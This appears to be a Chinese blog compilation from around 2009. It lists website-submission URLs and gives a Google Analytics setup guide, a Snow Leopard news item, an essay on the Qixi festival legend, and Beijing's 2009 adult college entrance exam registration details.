Scrubtheweb登录口:http://www.scrubtheweb.com/addurl.html
Surfgopher登录口:http://www.surfgopher.com/addurl.htm
hao123网址之家登录口: http://221.12.147.30/url_submit.php
好东西网址大全登录口: http://www.haodx.com/add.htm
114啦登录口: http://www.114la.com/
5599网址大全登录口: http://www.5599.net/wzdl.htm
万能网址导航登录口: http://www.tt98.com/
2345网址导航登录口: http://bbs.2345.com/forumdisplay.php?fid=26
百度登录口: http://www.baidu.com/search/url_submit.html
google登录口: http://www.google.com/intl/zh-CN/addurl.html
中国搜索登录口: http://ads.zhongsou.com/register/page.jsp
中国农业网址登录口: http://www.ny3721.com/url_add.asp
1181网址登录口: http://link.1181.com/adduser.asp
中华网址家园登录口: http://www.123-0.com/addurl.asp
1166网址之家登录口: http://www.1166.com/tool/add.html
1616网址导航登录口: http://www.1616.net/misc/coop.htm
1181网址大全登录口: http://link.1181.com/adduser.asp

网站流量统计分析工具-为什么不用Google Analytics?

Google AnalyticsGoogle Analytics(分析)是企业级的网络分析解决方案。此工具不但可让您进一步了解网站流量和营销效果,现在还提供了富有灵活性又易于使用的强大功能, 让您通过全新的方式查看并分析流量数据。有了 Google Analytics(分析),您就更能够撰写目标明确的广告、强化营销计划并提高网站的转化率。
我们都在用,您为什么不用呢?
哪些人应该使用 Google Analytics(分析)?
Google Analytics(分析)以简易的格式为下列人士提供了有价值的深入报告:

  • 网页设计人员
  • 在线营销商
  • 管理团队
  • 拥有网站的任何客户

Google Analytics(分析)有助于您不同程度地了解网站效果、产生此效果的原因、对哪些人效果好或不好等信息。
Google Analytics(分析)的好处
了解用户如何与您的网站互动并利用这一知识进行改进,这对于建立有效的在线业务至关重要。Google Analytics(分析)可帮助解决以下难题:

  • 访问者为什么、在哪些位置放弃您的购物车?
  • 是您的网站设计促使人们离开网站吗?
  • 对于您的网站,哪种营销活动最为有效?
  • 您的网站访问者来自何处?
  • 访问您的网站时用户都做了什么?
  • 用户使用哪些关键字来查找您的网站?

Google Analytics(分析)报告为您提供一份全面、易懂的直观报告,其功能如下:

  • 跟踪收入、转换率和投资回报率之类的电子商务指标。
  • 对有关用户的变量按人群分类定义,并分析每类人群的行为特点。
  • 帮助您了解访问者浏览您网站的方式

“点击量来源概述”报告即为一个报告范例。针对所选时间范围,该报告可显示以下内容:

  • 网站各种点击量的概述
  • 直接点击量与搜索引擎点击量的百分比
  • 最常见的点击量来源
  • 带来的点击量最多的关键字

安装使用
1) 首页你需要有一个Google帐户,然后到这个地址 http://www.google.com/intl/zh-CN_ALL/analytics/
2) 创建配置文件。 每个网站具有一个或多个 Google Analytics(分析)配置文件。配置文件包含一个网站的所有可用报告,但可以仅针对有限的数据进行报告或只向有限的用户授予访问权限。例如,您可以 为营销部门创建这样一个配置文件:即排除内部网页,并且只显示面向用户网页的报告。
3) 修改 Google Analytics(分析)跟踪代码 (GATC),自定义您的设置(可选)。请访问我们的帮助中心,了解有关以下操作的详情:
· 在单个配置文件中跟踪多个域
· 在单个配置文件中跟踪多个子域
· 跟踪多个域别名

对数据库驱动的网站、框架式内容、Flash 以及出站链接进行跟踪的要求也各不相同。第 4 步对于报告来说至关重要:在您添加 GATC 到网站前,Google Analytics(分析)不会获取数据,而您的报告将保持空白状态。
4) Google Analytics(分析)只会跟踪包含 Google Analytics(分析)跟踪代码的网页。把代码段复制并粘贴到内容的底部,直接贴在您计划要跟踪的每个网页的 </body> 标记之前。如果您使用一般包含或模板,则可以在该处输入。您需要通过手动使用包含或其他方式向网站各页添加该代码。
5) 对于 AdWords 广告客户,Google Analytics(分析)目前可以从 AdWords 广告系列中导入费用数据。要链接您的 AdWords 帐户和 Google Analytics(分析)帐户,请登录到 AdWords 帐户并按照”Analytics(分析)”标签下提供的步骤操作。
6) 设置目标和漏斗为可选项,但强烈建议您采用此选项。”目标”是访问者通过完成转换行为(例如购买、注册、下载或其他重要的综合浏览行为)到达的网页。”漏斗”是您希望访问者到达目标位置所经过的路径。您可以使用目标和漏斗来确定访问者在完成转换前在哪里退出、以及退出的原因。
在该步中,您可以:
· 区分目标和漏斗步骤(如果您的网址是动态生成的,或者您的网站只有一个网址)。
· 创建一个允许通过各种路径到达不同网页的漏斗步骤。
· 以漏斗步骤的方式跟踪出站链接。
· 跟踪下载和其他非综合浏览量。

用户通常都是在开始累积报告数据后才发现其漏斗存在问题,因此有必要在此步骤中花费一些时间来浏览一下帮助中心的信息。了解此数据可以帮您明显改善自己的转换率。
7) 在此步骤中,您需要将名为广告系列跟踪变量的 信息附加到广告系列中的超链接上。此过程称为”标记链接”,它可以帮助 Google Analytics(分析)根据您设置的变量生成报告。例如,如果您有两个不同的横幅广告链接到同一个网页,您可以为每个广告添加单独的变量,并分别跟踪 每个广告的效果。如果您在 AdWords 帐户中启用了自动标记功能,则无需针对 Google AdWords 广告采取上述操作。其他每次点击费用计划的广告系列数据可在完成此步骤后进行跟踪,但不适用于费用数据。
8) 在帐户的过滤器管理器部分,设置过滤器(Analytics(分析)设置 > 过滤器管理器)。通过过滤器,您可以在报告中包含或排除特定的数据。
例如,您可以过滤除您员工的网络点击量。我们的帮助中心详尽地介绍了您帐户中最常用的过滤器和预配置的过滤器。您还可以了解到有关自定义及启用过滤器的详细步骤。
9) 从您帐户的访问管理器部分添加用户(Analytics(分析)设置 > 访问管理器)。您可以将任意数量的用户添加到帐户中,并针对每个配置文件授予他们仅查看或管理级别的访问权限。
10) 如果您经营的是电子商务网站,请在您的 Google Analytics(分析)网站配置设置中启用电子商务报告。然后,通过在您的收据页面加入某些简单代码,Google Analytics(分析)就可以记录交易和产品信息。如果您的网站使用不同域的第三方购物车,请仔细阅读帮助中心的说明以避免发生常见错误。

雪豹操作系统—苹果最新发布

苹果已计划将其“雪豹”提前出笼。苹果下一代操作系统OS X 10.6(又称为雪豹)原计划于今年九月份推出,但苹果今天宣布,雪豹将于本周五上市发售。此次更新版本提供了一些改进,而不是一系列新的功能。
苹 果发布了其QuickTime多媒体软件的一个重要更新版本,甚至新手都可以很方便地使用这个版本进行视频编辑。它还具有将你的视频上传到YouTube 的内置支持。新版QuickTime还具有截屏功能,将屏幕上的变化记录下来并加上旁白录音。公司常利用这一功能创建有关公司软件或网站的教程或演示材 料。
加上额外费用,苹果的电邮及日历管理软件还能支持微软的Exchange电邮及通讯服务器软件,这有助于加强苹果操作系统在办公软件市场上的竞争力。

雪豹(Snow Leopard)

在过去的几年中,计算机芯片产业处于两个重大转变之中,一个是从32位芯片过渡到64位芯片,另一个是从单核过渡到多核。两者都在雪豹操作系统中得到了反映。
雪 豹操作系统这个更新版本具有更好的64位支持。 64位计算的主要优势是能够支持更大的内存。苹果的Mac Pro工作站电脑具有32GB的随机存取内存(RAM),但32位应用程序只能利用其中的4GB。苹果自己的应用程序,包括Safari网络浏览器和 iCal日历软件,都已重新编程为64位的版本,这样有助于提高运行速度。事实上,苹果公司称,它的时光机器备份软件(TimeMachine backup software)的速度能提高80%。
过去几年的另一个主要趋势是向多核芯片的过渡。苹果笔记本电脑都采用双核芯片,而 苹果Mac Pro工作站电脑最多可容纳2个四核芯片。要想充分利用这些多核芯片,需要重新编写应用程序,但苹果新版操作系统有一个新的技术,他们称之为Grand Central Dispatch(简称GCD技术)。该公司表示,通过GCD技术,开发者可以更容易编写能充分利用多核芯片优势的应用软件。
现代计算机还拥有非常强大的图形处理器。通常情况下,这些处理器只负责视频解码和图形渲染,但它们也可以用于补充计算机的一般处理能力。苹果还在雪豹中附加了对OpenCL的支持,OpenCl可以使电脑更为方便地利用这一额外的计算能力。
雪豹操作系统还将其安装空间缩减了7GB。其中部分的空间缩减是由于苹果停止了对旧的PowerPC芯片的支持,苹果自1994年起就在其电脑中采用这种芯片,直到2006年过渡到采用英特尔芯片为止。
微软也将发布其操作系统的一个重大更新版本。 Windows 7计划于10月22日上市发售。

七夕节的由来

七夕乞巧,这个节日起源于汉代,东晋葛洪的《西京杂记》有“汉彩女常以七月七日穿七孔针于开襟楼,人俱习之”的记载,这便是我们于古代文献中所见到的最早的关于乞巧的记载。后来的唐宋诗词中,妇女乞巧也被屡屡提及,唐朝王建有诗说“阑珊星斗缀珠光,七夕宫娥乞巧忙”。据《开元天宝遗事》载:唐太宗与妃子每逢七夕在清宫夜宴,宫女们各自乞巧,这一习俗在民间也经久不衰,代代延续。
宋元之际,七夕乞巧相当隆重,京城中还设有专卖乞巧物品的市场,世人称为乞巧市。宋罗烨、金盈之辑《醉翁谈录》说:“七夕,潘楼前买卖乞巧物。自七月一日,车马嗔咽,至七夕前三日,车马不通行,相次壅遏,不复得出,至夜方散。”在这里,从乞巧市购买乞巧物的盛况,就可以推知当时七夕乞巧节的热闹景象。人们从七月初一就开始办置乞巧物品,乞巧市上车水马龙、人流如潮,到了临近七夕的时日、乞巧市上简直成了人的海洋,车马难行,观其风情,似乎不亚于最盛大的节日–春节,说明乞巧节是古人最为喜欢的节日之一。
七夕节
每年农历的七月七日,即七夕,又称乞巧节,这个传说和牛郎,织女的神话传说有十分密切的关系。
七夕节始终和牛郎织女的传说相连,这是一个很美丽的,千古流传的爱情故事,成为我国四大民间爱情传说之一 。
相传在很早以前,南阳城西牛家庄里有个聪明.忠厚的小伙子,父母早亡,只好跟着哥哥嫂子度日,嫂子马氏为人狠毒,经常虐待他,逼他干很多的活,一年秋天,嫂子逼他去放牛,给他九头牛,却让他等有了十头牛时才能回家,牛郎无奈只好赶着牛出了村。
牛郎独自一人赶着牛进了山,在草深林密的山上,他坐在树下伤心,不知道何时才能赶着十头牛回家,这时,有位须发皆白的老人出现在他的面前,问他为何伤心,当得知他的遭遇后,笑着对他说:“别难过,在伏牛山里有一头病倒的老牛,你去好好喂养它,等老牛病好以后,你就可以赶着它回家了。
牛郎翻山越岭,走了很远的路,终于找到了那头有病的老牛,他看到老牛病得厉害,就去给老牛打来一捆捆草,一连喂了三天,老牛吃饱了,才抬起头告诉他:自己本是天上的灰牛大仙,因触犯了天规被贬下天来,摔坏了腿,无法动弹。自己的伤需要用百花的露水洗一个月才能好,牛郎不畏辛苦,细心地照料了老牛一个月,白天为老牛采花接露水治伤,晚上依偎在老年身边睡觉,到老牛病好后,牛郎高高兴兴赶着十头牛回了家。
回家后,嫂子对他仍旧不好,曾几次要加害他,都被老牛设法相救,嫂子最后恼羞成怒把牛郎赶出家门,牛郎只要了那头老牛相随。
一天,天上的织女和诸仙女一起下凡游戏,在河里洗澡,牛郎在老牛的帮助下认识了织女,二人互生情意,后来织女便偷偷下凡,来到人间,做了牛郎的妻子。织女还把从天上带来的天蚕分给大家,并教大家养蚕,抽丝,织出又光又亮的绸缎。
牛郎和织女结婚后,男耕女织,情深意重,他们生了一男一女两个孩子,一家人生活得很幸福。但是好景不长,这事很快便让天帝知道,王母娘娘亲自下凡来,强行把织女带回天上,恩爱夫妻被拆散。
牛郎上天无路,还是老牛告诉牛郎,在它死后,可以用它的皮做成鞋,穿着就可以上天。牛郎按照老牛的话做了,穿上牛皮做的鞋,拉着自己的儿女,一起腾云驾雾上天去追织女,眼见就要追到了,岂知王母娘娘拔下头上的金簪一挥,一道波涛汹涌的天河就出现了,牛郎和织女被隔在两岸,只能相对哭泣流泪。他们的忠贞爱情感动了喜鹊,千万只喜鹊飞来,搭成鹊桥,让牛郎织女走上鹊桥相会,王母娘娘对此也无奈,只好允许两人在每年七月七日于鹊桥相会。
后来,每到农历七月初七,相传牛郎织女鹊桥相会的日子,姑娘们就会来到花前月下,抬头仰望星空,寻找银河两边的牛郎星和织女星,希望能看到他们一年一度的相会,乞求上天能让自己能象织女那样心灵手巧,祈祷自己能有如意称心的美满婚姻,由此形成了七夕节。

现在考大学还不迟-通住大学路不止一条

一年一度的成人高考又要开始了,报名已经于8月15日展开(报名时间:8月15日0:00点至8月28日24:00)。如果您学历不高、学位没有但还怀有一颗炎热的名校之心。那么就看了解一下如何成就自己吧。
根据《教育部关于做好2009年全国成人高校招生工作的通知》(教学[2009]4号)的文件精神、北京市招生考试委员会《关于做好2009年北京市成人 高校招生工作的通知》(京招考委[2009]8号)及《北京教育考试考务管理规定(暂行)》(京考考务[2009]3号)的文件要求,特制定北京市成人高 校招生简章如下:
一、招生对象及报名条件
符合下列条件的中国公民可以报考
(一)遵守中华人民共和国宪法和法律。
(二)国家承认学历的各类高、中等学校在校生以外的在职、从业人员和社会其他人员。
(三)身体健康,生活能自理,不影响所报专业学习。
(四)报考高中起点升本科(以下简称高起本)或高中起点升专科(以下简称高起专)的考生应具有高中毕业文化程度。报考专科起点升本科(以下简称专升本)的考生必须是已取得经教育部审定核准的国民教育系列高等学校、高等教育自学考试机构颁发的专科或以上毕业证书的人员。
(五)报考成人高校医学门类专业的考生应具备以下条件:
1、报考临床医学、口腔医学、预防医学、中医学等临床类专业的人员,应当取得省级卫生行政部门颁发的相应类别的执业助理医师及以上资格证书,或取得国家认可的普通中专相应专业学历;或县级及以上卫生行政部门颁发的乡村医生执业证书并具有中专学历或中专水平证书。
2、报考护理学专业的人员应当取得省级卫生行政部门颁发的执业护士证书。
3、报考医学门类其他专业的人员应当是从事卫生、医药行业工作的在职专业技术人员。
4、考生报考的专业,原则上应与所从事的专业对口。

报名:
报名方式:实行全部网上报名、全部网上交费、区县确认的方式。
1.网上报名时间:8月15日0:00点至8月28日24:00,逾期不予办理。
网 址:www.bjeea.cnwww.bjeea.edu.cn
2.全部网上交费:请考生在报名前仔细阅读《2009年北京市成人高校招生网上报名网上交费说明》。支持网上交费的银行卡,有些是需要提前注册的,考生应 提前做好准备,以免耽误报名。考生在网上填写完报名信息后,报名并未结束,系统提示进行网上交费。交费成功后,生成网报号,此时报名成功。
3.报名确认时间:9月3日至7日,考生按本人选择的确认日期,到选择的区县成招办进行报名确认,逾期不予办理。
确认地点:各区县设立的报名确认点具体地址及工作时间附后。

具体的东西到这里来看看吧:注:北京成考的官方网站,其它地区请到相应网站查询
北京教育考试院–成人高考:http://www.bjeea.cn/218987531880890368/index.shtml
招生简章链接:http://www.bjeea.cn/218988631392518144/20090721/40920.shtml
专升本院校目录:http://www.bjeea.cn/218990830415773696/20090805/41478.shtml

2009年全国成人高校招生统一考试时间安排

一、高中起点升本、专科考试时间安排

日期时间

10 月 17 日

10 月 18 日

9:00-11:00

语文

外语

14:30-16:30

数学(文科)
数学(理科)

史地(高起本文科)
理化(高起本理科)

二、专科起点升本科考试时间安排

日期时间

10 月 17 日

10 月 18 日

9:00-11:30

政治

大学语文
艺术概论
高等数学(一)
高等数学(二)
民法
教育理论
生态学基础
医学综合

考生根据报考的专业考一门

14:30-17:00

外语